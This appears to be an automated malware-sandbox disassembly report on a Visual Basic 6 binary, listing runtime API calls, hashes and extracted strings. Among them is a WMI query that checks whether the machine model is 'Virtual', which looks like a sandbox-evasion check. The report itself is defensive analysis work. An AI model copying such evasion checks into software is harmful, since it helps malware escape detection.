                                                                    • Instruction Fuzzy Hash: F381F8B1900208EADB10DFD1CC85FDEBBB8BF08704F1085AAE505B7191DB799A45CF65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054E491
                                                                    • __vbaVarDup.MSVBVM60 ref: 0054E4C5
                                                                    • #626.MSVBVM60(?,?,0000000A), ref: 0054E4D6
                                                                    • __vbaVarZero.MSVBVM60(?,?,0000000A), ref: 0054E4E4
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,0000000A,?,?,0000000A), ref: 0054E4FF
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054E518
                                                                    • __vbaVarLateMemCallLd.MSVBVM60(?,?,ExecQuery,00000001), ref: 0054E537
                                                                    • __vbaVarZero.MSVBVM60 ref: 0054E547
                                                                    • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?), ref: 0054E573
                                                                    • __vbaVarLateMemCallLd.MSVBVM60(?,?,Model,00000000), ref: 0054E58F
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?), ref: 0054E59C
                                                                    • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054E5C1
                                                                    • __vbaVarDup.MSVBVM60 ref: 0054E5EF
                                                                    • #633.MSVBVM60(?,00000002,?,?,00000001), ref: 0054E614
                                                                    • #635.MSVBVM60(?,?,00000002,?,?,00000001), ref: 0054E61D
                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,?,?,?,00000002,?,?,00000001), ref: 0054E634
                                                                    • __vbaAryUnlock.MSVBVM60(?,0054E6A1), ref: 0054E668
                                                                    • __vbaFreeObj.MSVBVM60(?,0054E6A1), ref: 0054E673
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,0054E6A1), ref: 0054E688
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054E693
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054E69B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$List$CallChkstkEachLateZero$#626#633#635MoveNextUnlock
                                                                    • String ID: ExecQuery$Model$Select * from Win32_ComputerSystem$Virtual$winmgmts:\\.\roo
                                                                    • API String ID: 317657414-3508441954
                                                                    • Opcode ID: ab30cbbea380c31f75489986784e7d93bff89fe5db6f679705c38951ddc44263
                                                                    • Instruction ID: 018c7f4f6ec0c4baca270a973e85720515c886150e909b25a3c45fef7603af7a
                                                                    • Opcode Fuzzy Hash: ab30cbbea380c31f75489986784e7d93bff89fe5db6f679705c38951ddc44263
                                                                    • Instruction Fuzzy Hash: 5451D5B280021CAADB11DBD1CD46FDEB7BCAB04304F1045AAE109B7191EB796B498FA5
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C2F2C
                                                                    • __vbaStrCat.MSVBVM60(0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F60
                                                                    • __vbaStrMove.MSVBVM60(0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F6A
                                                                    • __vbaStrCat.MSVBVM60(0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F75
                                                                    • __vbaStrMove.MSVBVM60(0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F7F
                                                                    • __vbaStrCat.MSVBVM60(0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F8A
                                                                    • __vbaStrMove.MSVBVM60(0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F94
                                                                    • __vbaStrCat.MSVBVM60(0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F9F
                                                                    • __vbaStrMove.MSVBVM60(0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2FA9
                                                                    • __vbaStrCat.MSVBVM60(0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2FB4
                                                                    • __vbaStrMove.MSVBVM60(0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2FBE
                                                                    • __vbaStrCat.MSVBVM60(0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FC9
                                                                    • __vbaStrMove.MSVBVM60(0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FD3
                                                                    • __vbaStrCat.MSVBVM60(0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FDE
                                                                    • __vbaStrMove.MSVBVM60(0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FE8
                                                                    • __vbaStrCat.MSVBVM60(0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FF3
                                                                    • __vbaStrMove.MSVBVM60(0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FFD
                                                                    • __vbaStrCat.MSVBVM60(0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000), ref: 005C3008
                                                                    • __vbaStrMove.MSVBVM60(0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000), ref: 005C3012
                                                                    • __vbaStrCat.MSVBVM60(0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000), ref: 005C301D
                                                                    • __vbaChkstk.MSVBVM60(0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8), ref: 005C302F
                                                                      • Part of subcall function 0054F663: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054F67F
                                                                      • Part of subcall function 0054F663: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401526), ref: 0054F697
                                                                      • Part of subcall function 0054F663: #653.MSVBVM60(?,?,?,00000008,?,?,00401526), ref: 0054F6A4
                                                                      • Part of subcall function 0054F663: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401526), ref: 0054F6AD
                                                                      • Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60 ref: 0054F6C6
                                                                      • Part of subcall function 0054F663: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054F6FB
                                                                      • Part of subcall function 0054F663: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F70C
                                                                      • Part of subcall function 0054F663: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F716
                                                                      • Part of subcall function 0054F663: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054F725
                                                                      • Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60(0054F768), ref: 0054F762
                                                                    • __vbaStrVarMove.MSVBVM60(00000000,00000000,0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8), ref: 005C304A
                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8), ref: 005C3054
                                                                    • __vbaFreeStrList.MSVBVM60(00000009,?,?,0040B45C,0040B46C,00000000,0040B1F0,00000000,0040B380,00000000,00000000,00000000,0040B97C,00000000,0040B964,00000000), ref: 005C307F
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C3091
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$Free$ChkstkList$#632#653
                                                                    • String ID:
                                                                    • API String ID: 4029463932-0
                                                                    • Opcode ID: 422ba0568d9e2c969a6cd2cc6caea86c5b0873fd1c7b089b4d8dd28dccff5d4c
                                                                    • Instruction ID: ff5e5ae46b63ad23feb8941baf45882c2eadd373bc84d82db604c6a8dabb13fe
                                                                    • Opcode Fuzzy Hash: 422ba0568d9e2c969a6cd2cc6caea86c5b0873fd1c7b089b4d8dd28dccff5d4c
                                                                    • Instruction Fuzzy Hash: 4B41BE72A40108AAD701EBE5CD42EEE77BDEF45704F50813BB501B71E2EE785A058BA9
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C7023
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 005C7064
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C3AC,000000A0), ref: 005C70AE
                                                                    • __vbaStrCmp.MSVBVM60(password,?), ref: 005C70CA
                                                                    • __vbaFreeStr.MSVBVM60(password,?), ref: 005C70E0
                                                                    • __vbaFreeObj.MSVBVM60(password,?), ref: 005C70E8
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,004014A8,0040C314,000002B4), ref: 005C7132
                                                                    • __vbaVarDup.MSVBVM60(password,?), ref: 005C717B
                                                                    • __vbaVarDup.MSVBVM60(password,?), ref: 005C7194
                                                                    • #595.MSVBVM60(?,00000000,?,0000000A,0000000A,password,?), ref: 005C71AB
                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,0000000A,?,00000000,?,0000000A,0000000A,password,?), ref: 005C71C2
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 005C71DD
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C3AC,00000204), ref: 005C7223
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040C3AC,00000204), ref: 005C723A
                                                                    • #599.MSVBVM60({Home}+{End},0000000A), ref: 005C7256
                                                                    • __vbaFreeVar.MSVBVM60({Home}+{End},0000000A), ref: 005C725E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$CheckHresult$#595#599ChkstkList
                                                                    • String ID: password${Home}+{End}
                                                                    • API String ID: 938176104-3822402063
                                                                    • Opcode ID: 6dc114b7e537e65a309cbc68b0f04ef21c676b2e242459aa33252d97b29926c0
                                                                    • Instruction ID: 8d720e83682883a44ce5818f6a81964ba0f228d75f05e74c23213e588ded1da4
                                                                    • Opcode Fuzzy Hash: 6dc114b7e537e65a309cbc68b0f04ef21c676b2e242459aa33252d97b29926c0
                                                                    • Instruction Fuzzy Hash: 7361D471A0021CAFCB10EF94C885BDDBBB8FF09304F5085AAE549BB1A1D7789A85CF55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C746
                                                                      • Part of subcall function 0054C6B3: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C6CE
                                                                      • Part of subcall function 0054C6B3: __vbaRedim.MSVBVM60(00000080,00000001,005C9210,00000011,00000001,0000003F,00000000,?,?,?,?,00401526), ref: 0054C6F4
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401526), ref: 0054C764
                                                                    • #644.MSVBVM60(00000000,?,?,?,?,?,00401526), ref: 0054C76B
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,00401526), ref: 0054C779
                                                                    • __vbaStrCat.MSVBVM60(0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C792
                                                                    • __vbaStrMove.MSVBVM60(0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C79C
                                                                    • __vbaStrCat.MSVBVM60(0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7A7
                                                                    • __vbaStrMove.MSVBVM60(0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7B1
                                                                    • __vbaStrCat.MSVBVM60(0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7BC
                                                                    • __vbaStrMove.MSVBVM60(0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7C6
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7CC
                                                                    • __vbaStrCat.MSVBVM60(0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?), ref: 0054C7DC
                                                                    • __vbaStrMove.MSVBVM60(0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?), ref: 0054C7E6
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?), ref: 0054C7EC
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000), ref: 0054C7FA
                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,00000000,0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000), ref: 0054C811
                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0054C823
                                                                    • #644.MSVBVM60(?,?), ref: 0054C839
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?), ref: 0054C845
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000040,?,?,?,?,00000040,?,?,?), ref: 0054C868
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$ErrorSystem$#644ChkstkFree$ListLockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 740360539-0
                                                                    • Opcode ID: 728114641df7a79aac841adb6583233822abd9a879369509690eae40c3288537
                                                                    • Instruction ID: 7a752b8ccec2d36940732cf74105f7a2d05fb18cf9d3a0d11c1ef7fd71a57e80
                                                                    • Opcode Fuzzy Hash: 728114641df7a79aac841adb6583233822abd9a879369509690eae40c3288537
                                                                    • Instruction Fuzzy Hash: 9B310EB1A40209ABCB01EBE5CC46EEE77BCAF44708F10453BF501B71E1DE7999058769
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C5DA8
                                                                    • #648.MSVBVM60(0000000A), ref: 005C5DDE
                                                                    • __vbaFreeVar.MSVBVM60(0000000A), ref: 005C5DF0
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,0000000A), ref: 005C5E09
                                                                    • __vbaVarTstEq.MSVBVM60(00008008,00000000,?,?,?,0000000A), ref: 005C5E13
                                                                    • #645.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E2E
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E38
                                                                    • __vbaStrCmp.MSVBVM60(0040AC10,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E43
                                                                    • __vbaFreeStr.MSVBVM60(0040AC10,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E56
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$#645#648ChkstkMoveNofreeVarg
                                                                    • String ID:
                                                                    • API String ID: 3980291390-0
                                                                    • Opcode ID: c5c3566d4b7974a554dd0a241a8fc225d87a32eebf33b056c6fde544e92cb717
                                                                    • Instruction ID: 11baeeb10c0f6c1011a1fd744a15cf69d863ea98a056baf5c62e3208a1aa3604
                                                                    • Opcode Fuzzy Hash: c5c3566d4b7974a554dd0a241a8fc225d87a32eebf33b056c6fde544e92cb717
                                                                    • Instruction Fuzzy Hash: BB413475900609EFCB00EFA5C885EAE7BB8FF04704F108569F915AB2E1DB78E985CB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C557C
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C55BD
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C5601
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000058), ref: 005C563C
                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 005C565D
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BED4,000000E0), ref: 005C5692
                                                                    • __vbaStrI2.MSVBVM60(?), ref: 005C56A3
                                                                    • __vbaStrMove.MSVBVM60(?), ref: 005C56AD
                                                                    • #690.MSVBVM60(?,Options,Show Tips at Startup,00000000,?), ref: 005C56C0
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 005C56CF
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00401526), ref: 005C56E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckHresult$FreeList$#690ChkstkMoveNew2
                                                                    • String ID: Options$Show Tips at Startup
                                                                    • API String ID: 557462102-2759323971
                                                                    • Opcode ID: be44a6ea1aab923b223c11acc9a7f3ad81ddb6eb90b6aaffbd788842099228da
                                                                    • Instruction ID: da9f9441e7b7ee10e8fc2eca13fd522e4376d56dc14b15ccd0d30e7587934896
                                                                    • Opcode Fuzzy Hash: be44a6ea1aab923b223c11acc9a7f3ad81ddb6eb90b6aaffbd788842099228da
                                                                    • Instruction Fuzzy Hash: 3651A171D00608AFCB01DFD4D849FDEBBB9FB08344F50442AF505BB2A1D779A9949B98
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054EEDD
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054EEF6
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054EF15
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054EF47
                                                                    • __vbaVarCmpGt.MSVBVM60(?,005C92C0,00008003,0000000B), ref: 0054EF93
                                                                    • __vbaVarOr.MSVBVM60(?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EF9D
                                                                    • __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFA3
                                                                    • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFAF
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,005C9220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFD8
                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0054EFEA
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054F02A
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054F042
                                                                    • __vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054F068
                                                                    • __vbaFreeObj.MSVBVM60(0054F0AB,?,00006011,?), ref: 0054F0A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresultMove$AddrefBoolChkstkLockNullRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 4045727025-0
                                                                    • Opcode ID: 29b91bc42912a3bc9b310bbd0cdda3b676bd3b1d8dc34fa730680110e473dc14
                                                                    • Instruction ID: 029f9c49dd1ee4880fa9ced8260b98b989ed3db2dae99dfc53156becf0ce91cb
                                                                    • Opcode Fuzzy Hash: 29b91bc42912a3bc9b310bbd0cdda3b676bd3b1d8dc34fa730680110e473dc14
                                                                    • Instruction Fuzzy Hash: B951C471900218AFDB10EFA4CC89FDDBBB9FB08318F14442AF105BB1A2D7799948DB64
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054CF15
                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,00401526), ref: 0054CF2D
                                                                    • #526.MSVBVM60(?,00000104,?,?,?,?,00401526), ref: 0054CF3B
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000104,?,?,?,?,00401526), ref: 0054CF44
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000104,?,?,?,?,00401526), ref: 0054CF4E
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000104,?,?,?,?,00401526), ref: 0054CF56
                                                                      • Part of subcall function 005C812E: __vbaChkstk.MSVBVM60(00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8149
                                                                      • Part of subcall function 005C812E: __vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8161
                                                                      • Part of subcall function 005C812E: __vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C816B
                                                                      • Part of subcall function 005C812E: #644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8171
                                                                      • Part of subcall function 005C812E: __vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C817C
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFA0
                                                                    • #616.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFB7
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFC1
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFD0
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFDB
                                                                    • __vbaFreeStr.MSVBVM60(0054D013,?,?,00000104,00004008,?,?,?,00004008), ref: 0054D005
                                                                    • __vbaFreeStr.MSVBVM60(0054D013,?,?,00000104,00004008,?,?,?,00004008), ref: 0054D00D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
